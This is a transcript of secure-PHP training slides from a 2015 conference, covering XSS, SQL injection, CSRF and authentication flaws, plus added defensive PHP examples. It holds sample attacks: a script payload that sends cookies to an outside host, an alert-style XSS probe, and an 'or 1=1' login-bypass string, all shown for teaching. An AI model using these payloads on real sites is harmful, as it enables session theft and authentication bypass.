PHP Security Bootcamp

The web is becoming a more and more dangerous place every day. You, as a PHP application developer, need to be armed with the tools and knowledge to make your applications as secure as possible. Come get hands-on training in applying secure design principles, testing code for vulnerabilities and fixing the problems we find together. We'll be using a vulnerable application to illustrate some of the most common vulnerabilities like cross-site scripting, SQL injection and other notables from the OWASP Top 10 list. You'll walk away with a grasp of good secure coding practices and a platform for future experimentation.

At Lone Star PHP 2015

Chris Cornutt

April 18, 2015

Transcript

  1. Secure PHP Development
    Chris Cornutt @enygma

  2. PHP Dev … Years
    Appsec Engineer
    http://websec.io
    http://securingphp.com

  3. Goals
    Basic appsec principles
    Vulnerabilities & Exploits
    Hands-on experience
    Tools & Techniques

  4. http://bit.ly/owasptop…

  5. There's
    no such thing
    as secure

  6. https://github.com/psecio/notch
    Notch: A Vulnerable Application

  7. https://github.com/psecio/notch
    Setup Time
    or http://notch.securingphp.com

  8. XSS:
    Cross Site Scripting

  9. Injection of content into the page
    usually Javascript
    reflected vs stored
    poor output escaping

  10. Context
    CSS:            style: foo-<?=$input?>
    Javascript:     var name = "<?=$input?>";
    HTML:           <?=$input?>
    HTML Attribute: ...="<?=$input?>">foo
    Query value:    $url = "http://foo.com?data=".$input

  11. Example
    <?php
    echo "Howdy, my name is ".$_GET['name'];
    ?>
    ?name=<script>alert("xss")</script>

  12. Example
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open(
        'GET',
        'http://leethack.php?cookies='+document.cookie,
        true);
    xmlhttp.send();
    Assumes cross-origin policy of …

  13. Prevention #1
    <?php
    $name = htmlspecialchars(
        $_GET['name'], ENT_COMPAT, 'UTF-8'
    );
    echo "Howdy, my name is ".$name;
    ?>
    Note: This is only for an HTML context

  14. Prevention #2
    {{ name|e('html') }}
    {{ name|e('html_attr') }}
    {{ name|e('js') }}
    {{ name|e('css') }}
    Note: This example requires Twig
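The context-specific escaping from the slides above, as an added example that is not part of the original deck: one escaper per output context (HTML, HTML attribute, JavaScript, query value, and a reject-by-default rule for CSS), applied to the payload from the XSS example slide. The helper names (escapeHtml, escapeJs and so on) and the constructed input are this example's own; the prevention slides use htmlspecialchars and Twig's e filter, and this block uses only PHP's standard library.

```php
<?php
// Added example, not from the slides: one escaper per output context listed on
// the "Context" slide, applied to the payload from the slide's example. The
// helper names are this example's own.
declare(strict_types=1);

// HTML body text. ENT_QUOTES escapes both quote styles (the slide's ENT_COMPAT
// leaves single quotes alone); ENT_SUBSTITUTE keeps invalid UTF-8 from
// emptying the output.
function escapeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HTML attribute value. Safe only when the attribute is quoted in the template.
function escapeHtmlAttr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript string literal, quotes included. json_encode with the HEX flags
// turns < > & ' " into \uXXXX, so a "</script>" in the data cannot close the block.
function escapeJs(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Query-string value: percent-encode everything outside the unreserved set.
function escapeUrlParam(string $s): string
{
    return rawurlencode($s);
}

// CSS: there is no general-purpose escaping that makes arbitrary input safe in a
// style context, so allow only an identifier-like token and reject the rest.
function escapeCss(string $s): string
{
    if (preg_match('/^[A-Za-z0-9_-]+$/', $s) !== 1) {
        throw new InvalidArgumentException('value not allowed in CSS context');
    }
    return $s;
}

// Render the same input into each context from the slide.
function render(string $input): array
{
    return [
        'html'      => '<p>Howdy, my name is ' . escapeHtml($input) . '</p>',
        'html_attr' => '<div title="' . escapeHtmlAttr($input) . '">foo</div>',
        'js'        => 'var name = ' . escapeJs($input) . ';',
        'query'     => 'http://foo.com?data=' . escapeUrlParam($input),
    ];
}

$input = '<script>alert("xss")</script>'; // constructed input: the slide's own payload

foreach (render($input) as $context => $markup) {
    // Self-check: the raw tag must not survive in any context.
    if (strpos($markup, '<script>') !== false) {
        throw new RuntimeException("raw script tag survived in $context context");
    }
    echo $context, ': ', $markup, PHP_EOL;
}

try {
    escapeCss($input);
} catch (InvalidArgumentException $e) {
    echo 'css: ', $e->getMessage(), PHP_EOL;
}
```

In a template the JavaScript escaper is used without surrounding quotes, `var name = <?= escapeJs($input) ?>;`, because json_encode emits the quotes itself. Twig's `e('js')` and `e('css')` filters from the slide do the equivalent work for the two contexts where hand-written escaping is easiest to get wrong.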

  15. SQLi:
    SQL Injection

  16. Injection specific to SQL statements
    expose data
    bypass auth mechanisms
    poor input filtering

  17. Example
    $sql = 'select id
    from users
    where username = "'.$_POST['username'].'"
    and password = "'.$_POST['password'].'"';
    password=" or 1=1; #
    select id
    from users
    where username = "user1"
    and password = "" or 1=1; #

  18. addslashes
    mysql_real_escape_string
    mysqli_real_escape_string

  19. addslashes
    mysql_real_escape_string
    mysqli_real_escape_string
    X

  20. Prepared statements
    PDO
    Mysqli

  21. Prevention
    <?php
    $stmt = $dbh->prepare('select id from users'
        .' where username = :user'
        .' and password = :pass');
    $stmt->execute(array(
        'user' => $_POST['username'],
        'pass' => $_POST['password']
    ));
    $results = $stmt->fetchAll(PDO::FETCH_ASSOC);
    ?>
    Note: This example requires PDO support
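The prepared-statement prevention from the slide, as an added example not taken from the deck: the slide's login query rewritten with PDO and run against an in-memory SQLite database so it can be executed offline. The table, the sample user, the passphrase and the helper names are constructed here; the stored password is a password_hash output rather than the plaintext the slide's query compares.

```php
<?php
// Added example, not from the slides: the slide's login query rewritten with
// a PDO prepared statement and run against an in-memory SQLite database so it
// works offline. The table, the sample user and the helper names are
// constructed for this example.
declare(strict_types=1);

function buildDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec(
        'CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, password TEXT NOT NULL)'
    );
    // Store a hash, not the plaintext the slide's query compares against.
    $stmt = $pdo->prepare('INSERT INTO users (username, password) VALUES (:user, :pass)');
    $stmt->execute([
        'user' => 'user1',
        'pass' => password_hash('correct horse battery', PASSWORD_DEFAULT),
    ]);
    return $pdo;
}

// Returns the user id on success, null otherwise. The username travels to the
// database as a bound parameter, never as part of the SQL text, so the slide's
// '" or 1=1; #' input is compared literally and matches no row.
function authenticate(PDO $pdo, string $username, string $password): ?int
{
    $stmt = $pdo->prepare('SELECT id, password FROM users WHERE username = :user');
    $stmt->execute(['user' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    return password_verify($password, $row['password']) ? (int) $row['id'] : null;
}

$pdo = buildDb();

// Self-checks: correct credentials succeed, the injection string from the slide does not.
if (authenticate($pdo, 'user1', 'correct horse battery') !== 1) {
    throw new RuntimeException('valid login rejected');
}
if (authenticate($pdo, 'user1', '" or 1=1; #') !== null) {
    throw new RuntimeException('injected password accepted');
}
if (authenticate($pdo, '" or 1=1; #', 'anything') !== null) {
    throw new RuntimeException('injected username accepted');
}
echo "prepared statements: ok", PHP_EOL;
```

With MySQL rather than SQLite, also set `PDO::ATTR_EMULATE_PREPARES` to false so that the server, not the client library, receives the parameters separately from the statement text.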

  22. CSRF:
    Cross Site Request
    Forgery

  23. unvalidated form submission
    on all state changes
    what's the source
    simple
    randomized for each form

  24. Example
    <input type="hidden"
        value="098f6bcd4621d373cade4e832627b4f6"
        name="csrf-token"/>
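Token generation and validation for the hidden field on the slide, as an added example that is not part of the deck: one random token per form, stored server-side and compared in constant time. The store array stands in for $_SESSION so the file runs from the command line; the form id 'delete-account' and the helper names are constructed for this example.

```php
<?php
// Added example, not from the slides: per-form CSRF tokens. The $store array
// stands in for $_SESSION so this runs from the CLI; in a web request pass
// $_SESSION itself. The form id and helper names are this example's own.
declare(strict_types=1);

// One token per form, created on first use from the CSPRNG (not a hash of
// anything guessable) and kept server-side.
function csrfToken(array &$store, string $formId): string
{
    if (!isset($store['csrf'][$formId])) {
        $store['csrf'][$formId] = bin2hex(random_bytes(32));
    }
    return $store['csrf'][$formId];
}

// The hidden field for the form, matching the markup on the slide.
function csrfField(array &$store, string $formId): string
{
    $token = htmlspecialchars(csrfToken($store, $formId), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf-token" value="' . $token . '"/>';
}

// Call on every state-changing request before doing any work. The token is
// single-use: it is discarded whether or not the comparison succeeds.
function csrfValid(array &$store, string $formId, array $post): bool
{
    $expected = $store['csrf'][$formId] ?? null;
    $given = $post['csrf-token'] ?? null;
    unset($store['csrf'][$formId]);
    if (!is_string($expected) || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given); // constant-time comparison
}

$session = [];
echo csrfField($session, 'delete-account'), PHP_EOL;
$token = $session['csrf']['delete-account'];

// Self-checks: a genuine submission carries the token a cross-site page cannot read.
if (!csrfValid($session, 'delete-account', ['csrf-token' => $token])) {
    throw new RuntimeException('valid token rejected');
}
if (csrfValid($session, 'delete-account', ['csrf-token' => $token])) {
    throw new RuntimeException('token accepted twice');
}
csrfToken($session, 'delete-account'); // form rendered again: fresh token
if (csrfValid($session, 'delete-account', ['csrf-token' => $token])) {
    throw new RuntimeException('stale token accepted');
}
if (csrfValid($session, 'delete-account', [])) {
    throw new RuntimeException('missing token accepted');
}
echo "csrf: ok", PHP_EOL;
```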

  25. Auth*:
    Authentication &
    Authorization

  26. direct object reference A…
    data access
    dangerous actions
    poor user management

  27. plaintext passwords
    no password policy
    overly complex passwords
    password hints
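Password storage that avoids the failures listed on this slide, as an added example that is not from the deck: hash with password_hash, verify with password_verify, upgrade old hashes on login, and enforce a minimum length plus a denylist rather than composition rules. The in-memory user array, the constructed denylist and the helper names are this example's own.

```php
<?php
// Added example, not from the slides: password storage and a minimal policy.
// The $users array stands in for a database table; the denylist is a
// constructed stand-in for a real breached-password list.
declare(strict_types=1);

const MIN_PASSWORD_LENGTH = 12;
const DENYLIST = ['password1234', 'correct horse battery']; // constructed sample

// Length plus a denylist; no composition rules and no hints.
function checkPasswordPolicy(string $password): ?string
{
    if (strlen($password) < MIN_PASSWORD_LENGTH) { // byte length is fine for a minimum
        return 'password must be at least ' . MIN_PASSWORD_LENGTH . ' characters';
    }
    if (in_array(strtolower($password), DENYLIST, true)) {
        return 'password is too common';
    }
    return null;
}

// Store only the hash. password_hash chooses algorithm, cost and salt.
function register(array &$users, string $username, string $password): void
{
    $problem = checkPasswordPolicy($password);
    if ($problem !== null) {
        throw new InvalidArgumentException($problem);
    }
    $users[$username] = password_hash($password, PASSWORD_DEFAULT);
}

// Verify against the stored hash and transparently upgrade hashes made with
// an older algorithm or cost.
function login(array &$users, string $username, string $password): bool
{
    $hash = $users[$username] ?? null;
    if ($hash === null || !password_verify($password, $hash)) {
        return false;
    }
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $users[$username] = password_hash($password, PASSWORD_DEFAULT);
    }
    return true;
}

$users = [];
register($users, 'user1', 'a long enough passphrase');

// Self-checks: nothing plaintext is stored, verification works, policy is enforced.
if (strpos($users['user1'], 'a long enough') !== false) {
    throw new RuntimeException('plaintext password stored');
}
if (!login($users, 'user1', 'a long enough passphrase')) {
    throw new RuntimeException('valid password rejected');
}
if (login($users, 'user1', 'wrong passphrase')) {
    throw new RuntimeException('wrong password accepted');
}
try {
    register($users, 'user2', 'short');
    throw new RuntimeException('policy not enforced');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
echo "password storage: ok", PHP_EOL;
```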

  28. But wait, there’s
    more…

  29. Security Misconfiguration
    Sensitive Data Exposure
    Components with Known Vulnerabilities
    Unvalidated Redirects and Forwards

  30. That's all folks
    @enygma
    @securingphp
    http://securingphp.com